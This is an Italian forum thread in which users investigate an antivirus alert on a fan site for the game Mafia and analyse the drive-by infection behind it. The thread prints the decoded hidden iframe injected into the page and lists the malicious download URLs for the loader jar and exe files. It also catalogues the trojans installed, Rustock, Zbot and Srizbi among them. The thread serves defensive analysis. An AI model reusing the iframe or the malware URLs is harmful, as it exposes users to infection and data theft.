Ho notato che quando vado su questa pagina questa (http://www.mafianetwork.it/mafia/index.php?pagina=eggs) antivir mi segnala costantemente (è insopportabile:D ) che potrebbe essere infetta (il web guard). Si tratta di una sorta di guida al gioco Mafia per Pc, quindi voglio dire niente di astruso.
Il fatto è che ad un mio amico con Kasperky non trova alcun problema, quindi vorrei solo sapere se poter mettere l'indirizzo fra le eccezioni, oppure antivir ha ragione è c'è qualcosa che non va...
Grazie

è infetta da HTML/Infected.WebPage.Gen :p :D

non è che si incavola per i contenuti in sè ma per la presenza di oggetti estranei ;)

è infetta da HTML/Infected.WebPage.Gen :p :D

non è che si incavola per i contenuti in sè ma per la presenza di oggetti estranei ;)

sarà il caso di segnalarlo alla kaspersky ;)

[Sarei curioso di sapere se il Nod v3 dice qualcosa... (se qualche buon anima ha voglia di provare)]

A questo punto direi che l'ombrellino colpisce ancora!!:winner:

decodificato:
<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe><html>
un altro toro mattato :D
sembrerebbe un nuovo dominio da cui poter avere la fortuna di scaricare Sinowal,confermate?

il server a cui punta è nell'immagine:
http://www.fileqube.com/shared/MmFtEN37922


ccfelomvhk.com

basterebbe provare

basterebbe provare

ad avercela la chiavetta magica a lavoro :D

io manderei epa in avanscoperta :D

cmq corrisponde a 91.203.92.17 :p

Il KAV 2009 si comporta in modo un po' strano. Fino a un minuto fa mi faceva aprire la pagina, mentre bloccava il link al secondo degli easter eggs. Ora invece blocca il link postato da epa e tutti gli altri che fino ad un minuto fa erano visualizzabili.
Per la cronaca segnala: Trojan-Clicker.HTML.IFrame.od

Sono sotto Linux.
Oggi c'è stato un aggiornamento della versione di FF 3.0.

Ecco cosa accade se clicco sulla pagina:

http://img27.picoodle.com/img/img27/4/6/10/t_Schermata2m_bf0b2d9.png (http://www.picoodle.com/view.php?img=/4/6/10/f_Schermata2m_bf0b2d9.png&srv=img27)

Sarebbe interessante se qualche utente inserisce il desk di Opera 9.50 b2.......

p.s. Credo che non succede nulla lo stesso !!

Occorre scaricare il file d'installazione da 8.8 MB e non quello da 6.9 !!

http://snapshot.opera.com/windows/o950s_10048m.exe

Se c'è qualche utente che fà la prova consideri che la versione è non ancora definitiva quindi......

io manderei epa in avanscoperta :D

cmq corrisponde a 91.203.92.17 :p

...in compagnia di ehagvzyfrt.com :Perfido:

Sono sotto Linux.
Oggi c'è stato un aggiornamento della versione di FF 3.0.

Ecco cosa accade se clicco sulla pagina:

http://img27.picoodle.com/img/img27/4/6/10/t_Schermata2m_bf0b2d9.png (http://www.picoodle.com/view.php?img=/4/6/10/f_Schermata2m_bf0b2d9.png&srv=img27)

semprerebbe la funzionalità presente su google implementata anche su firefox

io manderei epa in avanscoperta :D


Grazie ne faccio a meno!!!!:p :D
Il KAV 2009 si comporta in modo un po' strano. Fino a un minuto fa mi faceva aprire la pagina, mentre bloccava il link al secondo degli easter eggs. Ora invece blocca il link postato da epa e tutti gli altri che fino ad un minuto fa erano visualizzabili.
Per la cronaca segnala: Trojan-Clicker.HTML.IFrame.od

Si io mi riferivo alla versione 7! Meglio così:)

semprerebbe la funzionalità presente su google implementata anche su firefox

Forte eh ? ;)

Su,su c'è qualche utente che ha installato l'ultima versione di Opera 9.50 con la funzionalità anti-malware e ci mostra cosa accade a schermo ?

Con Opera 9.27 che non ha alcuna funzionalità protettiva anti-malware naturalmente non accade nulla.

nel thread di mafia questo fatto era stato segnalato già da un po...in effetti anche io ero entrato su quel sito per cercare un informazione sul gioco (antivir si è accorto del problema)

:)

Ho notato che quando vado su questa pagina questa (http://www.mafianetwork.it/mafia/index.php?pagina=eggs) antivir mi segnala costantemente (è insopportabile:D ) che potrebbe essere infetta (il web guard). Si tratta di una sorta di guida al gioco Mafia per Pc, quindi voglio dire niente di astruso.
Il fatto è che ad un mio amico con Kasperky non trova alcun problema, quindi vorrei solo sapere se poter mettere l'indirizzo fra le eccezioni, oppure antivir ha ragione è c'è qualcosa che non va...
Grazie

a mia avira non segnala un bel niente....:confused: :mbe: ...mi devo preoccupare ..... :fagiano:

a mia avira non segnala un bel niente....:confused: :mbe: ...mi devo preoccupare ..... :fagiano:

la free non è dotata del modulo webguard

la free non è dotata del modulo webguard

ops....infetto sugno? :eek: :cry:

a mia avira non segnala un bel niente....:confused: :mbe: ...mi devo preoccupare ..... :fagiano:

Quando ho fatto la prova sotto windows con antivir free (ma sotto sistema virtualizzato) è apparso un avviso di virus !!

Quando ho fatto la prova sotto windows con antivir free (ma sotto sistema virtualizzato) è apparso un avviso di virus !!



a me niente di niente.....:confused: ...sto scannerizzando ora...vediamo

Ma se non sbaglio anche con il web guard disattivo dà l'avviso di virus, solo che il web guard dice che c'è la possibilità di virus, metre poi il processo guard dice che effettivamente c'è il virus.
Tra l'altro ho notato che con antivir l'opzione "IGNORA" è totalmente inutile, dato che finchè non si sbarazza del virus non è contento, e ti ripropone il messaggio finche non clicchi su "elimina":D (una sorta di percorso guidato..!!!)

azz. succede una cosa strana...sto aggiornando asquared per procedere ad una scansione ed il modulo auristico mi segnala che forse il file è infetto...:confused:

Idem, infatti mi sono stufato e l'ho disinstallato (a-squared:D )
Ora provo spy-sweeper!

azz. succede una cosa strana...sto aggiornando asquared per procedere ad una scansione ed il modulo auristico mi segnala che forse il file è infetto...:confused:

ma te sei peggio di una calamita, prima il tizio disoccupato che doveva colmare il tempo in qualche modo e ora il virus :D :p

io possiedo a-squared ma non ha avuto modo di notare nulla visto che avira è stato troppo performante :)

ma te sei peggio di una calamita, prima il tizio disoccupato che doveva colmare il tempo in qualche modo e ora il virus :D :p

io possiedo a-squared ma non ha avuto modo di notare nulla visto che avira è stato troppo performante :)


hmmmm....non ti rispondo nemmeno :ahahah: ..... sono un pò :tapiro: sai io essere un po ignorante :huh:

http://img27.picoodle.com/img/img27/4/6/10/t_Opera95m_869fc69.jpg (http://www.picoodle.com/view.php?img=/4/6/10/f_Opera95m_869fc69.jpg&srv=img27)

Ho provato a scaricare ed installare Opera 9.50 build 10048 (quella con la funzione antimalware potenziata) ebbene se effettivamente si apre la pagina del test come riportato nella sezione NEWS si ottiene l'avviso che è messo in evidenza ad inizio 3D:

http://www.hwupgrade.it/forum/showthread.php?t=1759235

Ma se apriamo il link in questo 3D, il comportamento di Opera è identico a quello della versione 9.27.
E quindi nessun avviso all'utente.
Naturalmente ho la protezione frodi attiva !!

Gli utenti possono vedere il look di questa versione di Opera.

p.s. Insomma, questo test, me lo sono dovuto fare da me !! :muro: :muro:

Kaspersky Trojan-Clicker.HTML.IFrame.od

Dovrebbe sfruttare MDAC Exploit in stile Neosploit attacker toolkit

sfrutta varie vulnerabilità,non solo mdac....m'è parso di aver visto tra le altri,roba riguardo quicktime,real one,windows media services
oltre al solito rootkit scarica altri 3 che avira definisce genericamente trojan dropper,un java virus,TR/Crypt.XPACK.Gen all'infinito finchè non si interrompe manualmente l'operazione,più qualcosina che attualmente 1 antivirus su 32 sembrano riconoscere,ma nulla di chè
non ho potuto non salvarmi il log delle connessioni,è qualcosa di allucinante da quanto traffico viene generato durante l'infezione:eek: :eek: :eek:
comunque gli indirizzi infetti da cui si avvia tutto sono:
http://ccfelomvhk.com/progs/blymdeivw/cppthyzd
http://ccfelomvhk.com/progs/blymdeivw/tuhvzqdrv.php
http://ccfelomvhk.com/dl/loaderadv542.jar
http://ccfelomvhk.com/dl/java.jar
http://ccfelomvhk.com/dl/loadadv542.exe
http://ccfelomvhk.com/dl/adv542.php

ovviamente chi vuol provare lo fa a suo rischio e pericolo consapevole di cosa va incontro ;)

Confermo che Avira free "mozzica" appena carica il sito :asd:

riconosce lo script appena viene caricato in cache e blocca tutto?

Ieri sera ho provato anche la build 10057.
Comportamento solito alla precedente !! :rolleyes:
FF3 quindi in questo link si è comportato meglio di Opera 9.50.

Ieri sera ho provato anche la build 10057.
Comportamento solito alla precedente !! :rolleyes:
FF3 quindi in questo link si è comportato meglio di Opera 9.50.

il vantoggio di opera è che a default non lo fa passare, ff si (provato ier su vm)

il vantoggio di opera è che a default non lo fa passare, ff si (provato ier su vm)

Per FF intendi, Wizard,FF3 ?

Frà pochetto proverò questa build 10063.
Spero sia migliore di quella che ho provato io ieri sera che mi ha dato qualche problemino di login in qualche forum.

[COLOR="Navy"]Per FF intendi, Wizard,FF3 ?



3 beta 5, la 3 stabile la sto scaricando ora ;)

3 beta 5, la 3 stabile la sto scaricando ora ;)

Ah la beta 5,capito !!
Prova la RC3 e poi facci sapere.

Pagina di test:

http://www.verybadsite.com/

lo stesso identico mes lo visualizza Firefox :D

Editato perchè la situazione si è modificata.

http://img26.picoodle.com/img/img26/4/6/12/t_KMeleonm_ea30fa2.jpg (http://www.picoodle.com/view.php?img=/4/6/12/f_KMeleonm_ea30fa2.jpg&srv=img26)

Ecco cosa si visualizza cliccando il link di test con altro browser (io ho usato K-Meleon).
Perdonate un pò di confusione !!!

Svelato l'arcano prima il test era indisponibile !!
Provate ora !!
Il messaggio è lo stesso che per le versioni precedenti !!:doh:

Solo coloro che hanno Opera visualizzano l'avviso sotto:

http://img28.picoodle.com/img/img28/4/6/12/t_Operam_0ac3dd6.jpg (http://www.picoodle.com/view.php?img=/4/6/12/f_Operam_0ac3dd6.jpg&srv=img28)

Ed infatti cliccando il link di test con K-Meleon visualizzo solo una pagina di pubblicità come ho inserito adesso
nel messaggio alla pagina precedente.
Mi scuso ancora per la confusione.......

sfrutta varie vulnerabilità,non solo mdac....m'è parso di aver visto tra le altri,roba riguardo quicktime,real one,windows media services
oltre al solito rootkit scarica altri 3 che avira definisce genericamente trojan dropper,un java virus,TR/Crypt.XPACK.Gen all'infinito finchè non si interrompe manualmente l'operazione,più qualcosina che attualmente 1 antivirus su 32 sembrano riconoscere,ma nulla di chè
non ho potuto non salvarmi il log delle connessioni,è qualcosa di allucinante da quanto traffico viene generato durante l'infezione:eek: :eek: :eek:
comunque gli indirizzi infetti da cui si avvia tutto sono:


ovviamente chi vuol provare lo fa a suo rischio e pericolo consapevole di cosa va incontro ;)

Uno dei TR/Crypt.XPACK.Gen è una nuova versione di rustock che installa

http://www.virustotal.com/it/analisis/845bc3e0c2770d1e2adebf77e5db75d6

rag se non sbaglio questo haute secure è un software installabile anche su firefox ed ie (ho usato questo prodotto quando era in beta se non ricordo male)

non saprei se con opera abbia qualche funzione in più però (o se cambi solo averlo installato di default)
:)

Uno dei TR/Crypt.XPACK.Gen è una nuova versione di rustock che installa

http://www.virustotal.com/it/analisis/845bc3e0c2770d1e2adebf77e5db75d6

aspè il rustock te lo crea in system32(uno dei .sys per capirci)...gli altri sono .exe TR/Crypt.XPACK.Gen(4 o 5,ora non ricordo)

Il file loadadv542.exe scarica vari eseguibili

1) cppthyzd (4 KB)
2) dwxnbsj.php (14 KB)
3) luzznriima.php (56 KB)
4) tuhvzqdrv.php (67,5 KB)
5) tuylqdhim.php (14 KB)
6) xkypgt.php (164 KB)

------------------------------------------------------
1) Trojan Downloade che scarica due eseguibili
http://www.virustotal.com/it/analisis/44bfd62d87b999eb351dc660448130a4

Uno dei file scaricati è
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MARIOFEV.B

L'altro è Email-Worm.Win32.Locksky.fn
------------------------------------------------------
2) Trojan Downloader
http://www.virustotal.com/it/analisis/8c1087857a33d2e6fd672b8a43ca9a79
------------------------------------------------------
3) Trojan Spy Zbot crea il file ntos.exe (che varia di dimensione ad ogni installazione) utilizzato spesso per spiare l'accesso a conti bancari

Crea anche i file
x:\WINDOWS\system32\wsnpoem\video.dll
x:\WINDOWS\system32\wsnpoem\audio.dll


http://www.virustotal.com/it/analisis/2d3dd5c24d7524f13348069224649a10
------------------------------------------------------
4) Dropper che installa rustock (file in c:\windows\system32\narqwe.sys)

Dropper
http://www.virustotal.com/it/analisis/f5692c374ba22183af00079ad4c29159
Driver
http://www.virustotal.com/it/analisis/c67dfe1843c3936022655c91fe717c01
------------------------------------------------------
5) Trojan Downloader
http://www.virustotal.com/it/analisis/24af2044e1dba9b9285ce4c004bf5bc9
------------------------------------------------------
6) Installa Spambot Srizbi

INFO
http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99&tabid=2

Dropper
http://www.virustotal.com/it/analisis/069e91a67ce858c3df097933cacffb81

Driver (qandr.sys)
http://www.virustotal.com/it/analisis/c1585176e0a6c8e51510fe306f93196c


Certo che loadadv542.exe ne scarica di virus. :rolleyes: :muro:

P.S. i file cambiano molto spesso.

a me non son capitate le 2 dll
una cosa è certa:chi viene colpito da questa roba non da qui a riuscire a prendersi tutte quelle porcherie avrà già riavviato il pc in preda al panico :D
però,però...questo tipo di infezioni penso siano fatte più per infettare pc che lavorarno 24h/24 senza magari qualcuno che ci stia necessariamente di fronte,altrimenti penso che anche il più ignorante in materia di questo mondo quanto meno si renda conto che qualcosa non va!